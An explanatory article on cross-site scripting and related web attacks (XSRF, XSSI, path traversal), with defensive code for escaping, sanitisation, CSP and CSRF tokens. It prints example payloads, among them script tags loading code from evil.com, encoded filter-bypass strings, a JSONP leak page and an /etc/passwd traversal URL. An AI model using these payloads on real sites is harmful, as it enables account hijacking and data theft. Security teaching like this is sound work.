What is a Cross Site Scripting (XSS) attack?

The name is easier to understand if you read it backwards: it is an attack that tricks the victim's browser into running a script, stored across on another site, as if it belonged to a site the victim trusts. The other site is typically the attacker's own, or a third party's site they have hacked and are using without the owner's knowledge.

To trick the victim, the attacker injects a snippet of malicious code somewhere the unwary user's browser will run it; this snippet either downloads the malicious code from the attacker's server or redirects the user to it. The attacker can inject the snippet either by submitting it to sites that accept user content, such as comments (stored XSS), or by crafting malicious URLs that trigger the attack when visited (reflected XSS).

How serious is the threat?

It's very serious: XSS is one of the most widespread vulnerabilities on the web. And it isn't limited to websites; many desktop apps nowadays are nothing more than a (Chromium-based) web browser disguised as an app, so they are vulnerable too. Examples include WhatsApp, Slack, code editors like Visual Studio Code and the Google Play app; the list is very long.

How do you prevent XSS?

As a user, your only (limited) defence is to be careful which links you click. But the onus is really on engineers to ensure the systems they design do not allow injection of malicious code. This is achieved by sanitising or escaping any content submitted by users, along with other measures. If you own a website, that is your responsibility.
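For content that should simply be displayed as text, escaping is the most basic of those measures. Here is a minimal sketch in JavaScript; the function name escapeHtml is our own, not a library API, and it is only safe for HTML text and quoted attribute values, not for URLs, CSS or JavaScript contexts:

```javascript
// Minimal HTML escaper: replaces the five characters that are special in HTML
// text and quoted attribute values with character references.
// '&' is replaced first so the '&' of newly added entities is not escaped again.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// A malicious comment becomes inert text when written into the page.
const comment = '<script src="http://evil.com/oh-dear.js"></script> Just an innocent comment';
console.log(escapeHtml(comment));
// &lt;script src=&quot;http://evil.com/oh-dear.js&quot;&gt;&lt;/script&gt; Just an innocent comment
```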

What does malicious XSS code look like?

Simple XSS payloads use tricks to include a script tag containing, or loading, the code that does the damage. For example:

<script src="http://evil.com/oh-dear.js"></script> Just an innocent comment on a message board...

How come web browsers allow code from third parties to run on MY website?

From the early days of the web, development has been driven by advertising (originally in the form of banner ads). Ads are implemented by inserting code from the advertising networks into people's websites, so for the web to be successful it was seen as essential that browsers didn't block scripts from third parties. Google Analytics is probably the most widely downloaded script on the whole internet.

And back in the days of HTTP/1, people were also keen to load scripting libraries like jQuery from shared hosts, hoping that the user had already downloaded them from another site and therefore wouldn't need to do so again.

Multinational websites such as Amazon want to share their assets between amazon.de, amazon.com, amazon.co.jp and so on. And site owners developing on a subdomain (new-version.example.com) want to load assets from the live site (say www.example.com).

So there are good reasons for allowing pages to load resources from other origins, which is why browser manufacturers took no steps to restrict it until very recently.

What they did take care of was giving site owners a way to control who can read their assets. By default, a page on another origin cannot read your JSON data through fetch or XMLHttpRequest, or use your web fonts, unless you opt in with the Access-Control-Allow-Origin and related Cross-Origin Resource Sharing (CORS) headers. Plain <script> tags are not restricted this way, which is what makes XSSI (below) possible. And third parties can always download your assets and host them somewhere out of your reach.
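On the server, opting in usually means echoing back the request's Origin header when it is on a list you trust, because Access-Control-Allow-Origin can name only a single origin (or *). A minimal, framework-agnostic sketch; the allowlist and the corsHeaders function are hypothetical:

```javascript
// Hypothetical list of origins allowed to read our responses.
const ALLOWED_ORIGINS = new Set([
  "https://www.example.com",
  "https://new-version.example.com",
]);

// Returns the CORS headers to add to a response, given the request's Origin header.
// For origins not on the list we add nothing, so browsers won't let their scripts
// read the response (the request itself may still reach the server).
function corsHeaders(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) {
    return {};
  }
  return {
    // Only one origin (or "*") may be named, so echo back the matching one.
    "Access-Control-Allow-Origin": requestOrigin,
    // The response now depends on Origin, so caches must key on it.
    "Vary": "Origin",
  };
}

console.log(corsHeaders("https://new-version.example.com"));
console.log(corsHeaders("https://evil.com")); // {}
```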

Are there any server headers that can help with XSS?

Eventually browser manufacturers came around to the idea that maybe they should try to protect their users from XSS, and the Content Security Policy (CSP) was introduced. It does exactly what you'd expect: it lets you say, for example, “only load CSS from these domains, JS from those” and so on. Sadly it took a while, and older browsers such as IE11 don't support it. But it's definitely a step in the right direction.
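A CSP is just a response header listing directives and the sources allowed for each. A sketch of building one in JavaScript; the CDN and font domains are hypothetical placeholders:

```javascript
// Builds a Content-Security-Policy header value from a map of
// directive name -> list of allowed sources.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(" ")}`)
    .join("; ");
}

const csp = buildCsp({
  "default-src": ["'self'"],
  "script-src": ["'self'", "https://cdn.example.com"],   // hypothetical CDN
  "style-src": ["'self'", "https://fonts.example.com"],  // hypothetical font host
  "object-src": ["'none'"],
});
console.log(`Content-Security-Policy: ${csp}`);
```

Because script-src does not include 'unsafe-inline', a browser enforcing this policy also refuses inline <script> blocks and inline event handlers such as onmouseover, which blocks several of the attacks described below.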

You can find out more about CSP, including browser support, on this reference site by Foundeo.

Types of XSS: Stored XSS and Reflected XSS

In stored XSS the attacker finds a way to inject malicious code into a site you visit, for example a news site, an illegal download site, or (often) a banner ad. In reflected XSS the attacker creates a link which, when you click it, makes the site echo the malicious code back into the page, so you end up infecting yourself.

Stored XSS: File Upload displayed in an iframe

When a site allows users to upload files which are then displayed to other users in an iframe, an attacker could upload an HTML file with a script tag inside:

This is my cool HTML page <script><!--
... here I can do evil things ...
--></script>

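This is a relatively simple attack to mitigate. Since you control the server where the malicious code is stored, you can simply serve uploaded documents from a separate subdomain, say user-content.example.com. That is a different origin, so the browser's same-origin policy stops scripts in those documents from accessing content on the main domain. (Cookies set for the whole example.com domain are still shared with subdomains, which is why some sites serve user content from an entirely separate domain.)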
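The protection comes from the browser's same-origin rule: two URLs share an origin only if scheme, host and port all match. A small sketch using the standard URL class (global in browsers and Node.js); the uploadUrl helper and its /files/ path are hypothetical:

```javascript
// Two URLs are same-origin when scheme, host and port all match;
// URL.prototype.origin serialises exactly those three parts.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

// Hypothetical location for user uploads on a separate subdomain.
function uploadUrl(fileId) {
  return `https://user-content.example.com/files/${encodeURIComponent(fileId)}`;
}

console.log(sameOrigin("https://www.example.com/account", uploadUrl("cool.html"))); // false
// The default port 443 is omitted from the origin, so these match.
console.log(sameOrigin("https://www.example.com/a", "https://www.example.com:443/b")); // true
```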

Reflected XSS

The classic reflected XSS attack tries to add a script tag to a URL:

https://example.com/<script>..evil.. </script>

Of course, a real attack will rarely be so blatant; instead it relies on the browser's (or server's) built-in decoding of special character encodings to slip past filters. Browsers nowadays offer some protection against such attacks, but a server should never rely on it. Still, it's interesting to see what these encodings look like:

Payload                                   Technique
example.com/<script>                      blatant
example.com/%3cscript%3e                  URL % encoding
example.com/%253cscript%253e              double URL % encoding
example.com/%c0%bcscript%c0%be            bad (overlong) UTF-8 encoding
example.com/%26lt;script%26gt;            HTML encoding
example.com/%26amp;lt;script%26amp;gt;    double HTML encoding
example.com/\074script\076                ASCII encoding (octal escapes)
example.com/\x3cscript\x3E                ASCII encoding with hexadecimal escapes
example.com/\u003cscript\u003e            ASCII encoding with Unicode escapes
example.com/+ADw-script+AD4-              UTF-7 encoding
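These tricks target filters that check the raw input. A sketch of why decoding before checking matters, and why it still isn't enough: the hypothetical helpers below URL-decode repeatedly and then look for a script tag. They catch the double-encoded variant but not the HTML-encoded one:

```javascript
// Hypothetical helper: URL-decodes repeatedly until the string stops changing,
// so that double-encoded input such as %253c is seen as "<".
function fullyUrlDecode(input, maxRounds = 5) {
  let current = input;
  for (let round = 0; round < maxRounds; round++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch {
      break; // malformed input such as the overlong %c0%bc throws a URIError
    }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Naive check for a script tag after URL-decoding.
function looksLikeScriptTag(input) {
  return /<\s*script/i.test(fullyUrlDecode(input));
}

console.log(looksLikeScriptTag("example.com/%253cscript%253e"));   // true
console.log(looksLikeScriptTag("example.com/%26lt;script%26gt;")); // false: decodes to &lt;script&gt;
```

This is one reason to escape data when writing it out, rather than trying to recognise every possible encoding on input.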

Stored XSS: Simple attacks with script tags and HTML sanitisation

The simplest XSS attack, below, may work if the site was built by hobbyists or amateurs, but a simple regular expression is usually enough to stop it.

Great site! <script src="http://evil.com/xss.js"></script>

Regular expressions are not the best approach, though. One reason is that they can easily match valid HTML, but attackers often get around them by submitting invalid HTML, taking advantage of the fact that browsers are very forgiving. So they could submit the following:

Great site! <a href="<script src="http://evil.com/xss.js"></a>

Or use hidden, non-rendered characters that can break a regular expression but are ignored by some (mostly older) browsers:

Great site! <scr\0ipt src="http://evil.com/xss.js"></scr\0ipt>

Or even simply use upper-case letters:

Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>
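To see how easily such a filter is bypassed, here is a deliberately naive sketch (for illustration only) that strips lower-case script tags:

```javascript
// Deliberately naive filter: removes <script ...>...</script> blocks,
// but only when written in lower case.
function naiveStrip(html) {
  return html.replace(/<script[^>]*>.*?<\/script>/g, "");
}

const attempts = [
  'Great site! <script src="http://evil.com/xss.js"></script>',
  'Great site! <SCRIPT SRC="http://evil.com/xss.js"></SCRIPT>',
];
for (const attempt of attempts) {
  console.log(naiveStrip(attempt));
}
// The first is cleaned; the upper-case version passes through untouched.
```

Adding the i flag to the regular expression closes this particular hole, but not the malformed-HTML or hidden-character tricks.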

The best approach to sanitisation is to:

  • parse the input into a DOM tree which is not rendered in the page
  • have a whitelist of allowed tags and attributes, and go through every node of that tree, deleting anything that is not on the whitelist
  • make sure any URLs and CSS attributes that are allowed are strictly sanitised, watching out for URLs that use the javascript: scheme
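The steps above can be sketched in JavaScript. To keep the example self-contained, it assumes the input has already been parsed (in a browser, for instance with DOMParser) into a simple hypothetical tree of { type, tag, attrs, children } and { type, text } nodes with lower-case names; the whitelist itself is also just an example. The sanitised tree still has to be serialised back to HTML with text and attribute values escaped:

```javascript
// Hypothetical whitelist: allowed tag -> allowed attributes.
const ALLOWED = {
  p: [], b: [], i: [], em: [], strong: [], br: [],
  a: ["href"],
};

// URL schemes allowed in href; javascript: (and everything else) is rejected.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function isSafeUrl(value) {
  try {
    // A dummy base lets relative URLs parse. The URL parser lower-cases the
    // scheme and strips leading spaces, so " JavaScript:..." is still caught.
    return SAFE_SCHEMES.has(new URL(value, "https://base.invalid/").protocol);
  } catch {
    return false;
  }
}

// Walks the (unrendered) tree and returns a copy containing only whitelisted
// tags and attributes. Disallowed elements are dropped with their children.
function sanitize(nodes) {
  const out = [];
  for (const node of nodes) {
    if (node.type === "text") {
      out.push({ type: "text", text: node.text });
    } else if (node.type === "element" &&
               Object.prototype.hasOwnProperty.call(ALLOWED, node.tag)) {
      const attrs = {};
      for (const [name, value] of Object.entries(node.attrs || {})) {
        if (!ALLOWED[node.tag].includes(name)) continue;    // e.g. onmouseover, style
        if (name === "href" && !isSafeUrl(value)) continue; // e.g. javascript:evil()
        attrs[name] = value;
      }
      out.push({ type: "element", tag: node.tag, attrs, children: sanitize(node.children || []) });
    }
    // Anything else (script, iframe, comments, ...) is skipped.
  }
  return out;
}

const parsed = [
  { type: "element", tag: "p", attrs: { onmouseover: "evil()" },
    children: [{ type: "text", text: "Great site!" }] },
  { type: "element", tag: "script", attrs: { src: "http://evil.com/xss.js" }, children: [] },
];
console.log(JSON.stringify(sanitize(parsed)));
// [{"type":"element","tag":"p","attrs":{},"children":[{"type":"text","text":"Great site!"}]}]
```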

Using HTML attributes for XSS attacks

A stored XSS attack doesn't necessarily need a script tag: some JavaScript in a tag attribute will do. The following would be triggered when someone moves the mouse over the comment:

<p onmouseover="var d=document;var s=d.createElement('script');s.src='http://evil.com/xss.js';d.body.appendChild(s);">Great site!</p>

Stored XSS: Using CSS attributes for XSS attacks

If a site allows users to, say, choose a color for the text of their comments, an attacker could submit something like red;" onmouseover="...evil JS..." as their color, and end up with:


<!-- what the coder expected the final results to be when
they built the site -->
<p style="color:SOME_CUSTOM_COLOR;">My Home Page</p>

<!-- what the attacker injected -->
<p style="color:red;" onmouseover="...evil JS...">My Home Page</p>
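The fix is to validate such values against a strict pattern instead of trying to strip dangerous characters. A sketch, assuming the site only needs a few named colors or hex codes (the list is hypothetical); the result should still be HTML-escaped when written into the attribute:

```javascript
// Hypothetical list of named colors the site offers.
const NAMED_COLORS = new Set(["black", "red", "green", "blue", "gray"]);
// #rgb or #rrggbb, nothing else.
const HEX_COLOR = /^#(?:[0-9a-f]{3}|[0-9a-f]{6})$/;

// Returns a known-safe color, or the fallback if the input doesn't match exactly.
function safeColor(input, fallback = "black") {
  const value = String(input).trim().toLowerCase();
  return NAMED_COLORS.has(value) || HEX_COLOR.test(value) ? value : fallback;
}

console.log(safeColor("#FF0000"));                           // #ff0000
console.log(safeColor('red;" onmouseover="...evil JS..."')); // black
```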

Stored XSS: JavaScript

A typical XSS fragment for a site that allows user submissions:

blah <span style='display:none'>"
+ (...evil js..., "")
+ "</span> nothing to see here

That relies on the fact that the submission will be pasted into a JavaScript string literal in the page, with code such as:

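// the page's script, with the user's submission pasted
// between the double quotes of a string literal:
$el.innerHTML = "blah <span style='display:none'>"
+ (...evil js..., "")
+ "</span> nothing to see here";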

The not-so-common comma operator in (...evil js..., "") evaluates the expression on its left, throws the result away and returns the one on its right: var a = (1, 2); console.log(a); // 2. So the evil code runs, and all it adds to the HTML is an empty string. The comma operator is often used when golfing or minifying, but rarely when hand coding because it is hard to read.
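A small runnable illustration of that behaviour, with a harmless push onto an array standing in for the evil code:

```javascript
const log = [];
// The left operand runs (its result is discarded); the right operand is the value.
const value = (log.push("evil code ran"), "");
const html = "blah <span style='display:none'>" + value + "</span> nothing to see here";
console.log(log);  // [ 'evil code ran' ]
console.log(html); // blah <span style='display:none'></span> nothing to see here
```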

So when user content is inserted into a string that will be handled by JS, it is important to escape single quotes as \x27 and double quotes as \x22.
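A sketch of such an escaping function (the name escapeJsString is our own). Besides quotes, it escapes backslashes, line breaks, and < and >, since a literal </script> inside a string would otherwise close the surrounding script block:

```javascript
// Escapes a value for insertion inside a quoted JavaScript string literal
// (single- or double-quoted). The backslash is handled first so that the
// backslashes introduced by later replacements are not escaped again.
function escapeJsString(value) {
  return String(value)
    .replace(/\\/g, "\\x5c")
    .replace(/'/g, "\\x27")
    .replace(/"/g, "\\x22")
    .replace(/</g, "\\x3c") // a literal </script> would end the script block
    .replace(/>/g, "\\x3e")
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    // U+2028/U+2029 were not allowed raw in string literals before ES2019
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

const submission = `blah <span style='display:none'>" + (alert(1), "") + "</span> nothing to see here`;
// The submission now stays inside the string literal instead of breaking out of it.
console.log(`$el.innerHTML = "${escapeJsString(submission)}";`);
```

Note that if the resulting string is then assigned to innerHTML it is parsed as HTML again, so it also needs HTML escaping; assigning it to textContent instead avoids that.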

Reflected XSS: AJAX

Sometimes a site takes text from the URL fragment (the part after #) and inserts it into the page. An example is Google Translate: https://translate.google.com/#en/de/...evil js..., where “…evil js…” could be <script>evil js</script>, which may be inserted into the translation box as live HTML if the site isn't careful (Google obviously is). The way to handle this is to escape the < and > characters as \x3c and \x3e. It is also important to set the charset of your document with Content-Type: text/html; charset=utf-8, to stop the browser interpreting it as UTF-7, where +ADw- and +AD4- are the encodings for < and >.

Cross-Site Request Forgery (XSRF)

This happens when an attacker stores some code in a page that requests a resource (often an image, but it could be the favicon too, for example) from a separate third-party site, for example your bank or Facebook (though it's unlikely they don't protect themselves against such attacks). If you are already logged in to the third-party site, the browser will send your cookies along with the request. So you could have an exploit such as:

An innocent message, la la
<!-- the attacker hides the exploit with display:none.
     This is a (fake) command which the user needs to be logged in
     to run; but if the user IS already logged in, then it WILL be
     run, as the cookies will be sent. It doesn't matter that the
     response is not an image, because of the display:none -->
<img style="display:none" src="http://facebook.com/post/?msg=blah">

To mitigate against those attacks, for a start make sure you use POST and not GET for any request that changes something. With each POST request, send a token with a timestamp, and expire it if the timestamp is too old (old = a few minutes). The token must be unguessable and tied to the user's session, so that a page on another site cannot forge it. Generate a new token for every request, and maybe even different tokens for different types of request.
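A minimal sketch of such tokens using Node.js's built-in crypto module: each token is an HMAC over the session id, the kind of request and a timestamp, so it cannot be forged without the server's secret. The secret handling, the five-minute limit and the action names are assumptions for illustration:

```javascript
const nodeCrypto = require("node:crypto");

const SECRET = nodeCrypto.randomBytes(32); // hypothetical per-server secret
const MAX_AGE_MS = 5 * 60 * 1000;          // "a few minutes"

function sign(sessionId, action, timestamp) {
  return nodeCrypto
    .createHmac("sha256", SECRET)
    .update(`${sessionId}|${action}|${timestamp}`)
    .digest("hex");
}

// Token = "<timestamp>.<hmac>", bound to the session and the kind of request.
function issueToken(sessionId, action, now = Date.now()) {
  return `${now}.${sign(sessionId, action, now)}`;
}

function verifyToken(token, sessionId, action, now = Date.now()) {
  const [tsText, mac] = String(token).split(".");
  const timestamp = Number(tsText);
  if (!Number.isFinite(timestamp) || mac === undefined) return false;
  if (timestamp > now || now - timestamp > MAX_AGE_MS) return false; // future or expired
  const expected = Buffer.from(sign(sessionId, action, timestamp), "hex");
  const given = Buffer.from(mac, "hex");
  // timingSafeEqual throws on different lengths, so compare lengths first.
  return given.length === expected.length && nodeCrypto.timingSafeEqual(given, expected);
}

const token = issueToken("session-123", "post-message");
console.log(verifyToken(token, "session-123", "post-message"));   // true
console.log(verifyToken(token, "session-123", "delete-account")); // false
```

The page puts the token in a hidden form field or request header; unlike cookies, the browser never adds it automatically, which is what defeats the forged request. This stateless version accepts a token more than once within its lifetime; making tokens single-use, as suggested above, requires the server to remember which ones have been spent.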

Cross Site Script Inclusion (XSSI)

In this case the attacker includes your script in their page. That way they can read any variables your script defines, since both scripts run in the same page and the browser doesn't distinguish between them. The simplest example is sensitive data embedded directly in the JS:

// your_script.js
var privateKey = "-----BEGIN RSA PRIVATE KEY-----" // etc

// attacker_page.html
<!doctype html>
<html>
<head>
    <!-- loads YOUR script, from YOUR site, into the attacker's page -->
    <script src="https://your_site/your_script.js"></script>
    <script>alert(privateKey)</script>
    ...
</head>
</html>

Another source of attacks is JSONP, as an attacker can simply define the callback function themselves and receive your data:


// attacker_page.html
<script>
    var my_callback = function (my_leaked_data) {
        doEvil(JSON.stringify(my_leaked_data));
    };
</script>
<script src="https://your_site/p?jsonp=my_callback"></script>

The defence is simply not to put sensitive information inside JS or JSONP responses. Other steps are the same as for XSRF (use POST, use tokens), and you can make JSON responses non-executable by adding a prefix such as ])}while(1);</x>, which your own code strips before parsing.
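A sketch of the prefix approach: the server prepends the prefix to every JSON response and its own client code removes it before parsing, while a <script> tag pointing at the same URL hits a syntax error on the leading ] and never sees the data. The function names are our own:

```javascript
// The leading "]" is a syntax error, so a <script> tag that includes the
// response fails before any of the data is evaluated.
const XSSI_PREFIX = "])}while(1);</x>";

// Server side: what gets sent as the body of a JSON response.
function protectJson(data) {
  return XSSI_PREFIX + JSON.stringify(data);
}

// Client side: your own code strips the prefix before parsing.
function parseProtectedJson(text) {
  if (!text.startsWith(XSSI_PREFIX)) {
    throw new Error("Response is missing the expected XSSI prefix");
  }
  return JSON.parse(text.slice(XSSI_PREFIX.length));
}

const body = protectJson({ user: "brett", balance: 42 });
console.log(parseProtectedJson(body).balance); // 42
```

In the browser, your code would call parseProtectedJson(await response.text()) on the fetch response instead of response.json().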

Path Traversal

The classic exploit tries to trick the server into serving files from outside the server root:

https://example.com/../../../../../../../etc/passwd

Few servers allow that with their default configuration, but be careful when customising it. Also be careful about allowing users to choose strings such as brett/../../ as a username, in case it ends up in a file path.
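If your own code maps URLs or usernames to files, resolve the final path and check that it is still inside the root. A sketch using Node.js's path module; the function name and the /srv/www root are hypothetical, and the outputs shown are for a POSIX system:

```javascript
const path = require("node:path");

// Maps a user-supplied path to a file under `root`, or returns null if the
// result would escape the root (e.g. "../../etc/passwd" or "brett/../../").
function resolveInsideRoot(root, userPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(userPath); // "%2e%2e/" is "../" too
  } catch {
    return null; // malformed percent-encoding
  }
  const absoluteRoot = path.resolve(root);
  // Prefix with "./" so a leading "/" cannot jump to the filesystem root.
  const target = path.resolve(absoluteRoot, "." + path.sep + decoded);
  const relative = path.relative(absoluteRoot, target);
  if (relative === ".." || relative.startsWith(".." + path.sep) || path.isAbsolute(relative)) {
    return null;
  }
  return target;
}

console.log(resolveInsideRoot("/srv/www", "css/site.css"));           // /srv/www/css/site.css
console.log(resolveInsideRoot("/srv/www", "../../../../etc/passwd")); // null
```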

Conclusion

This is just scratching the surface of XSS and related attacks; it is a specialist field, but one that every front-end developer should at least be familiar with.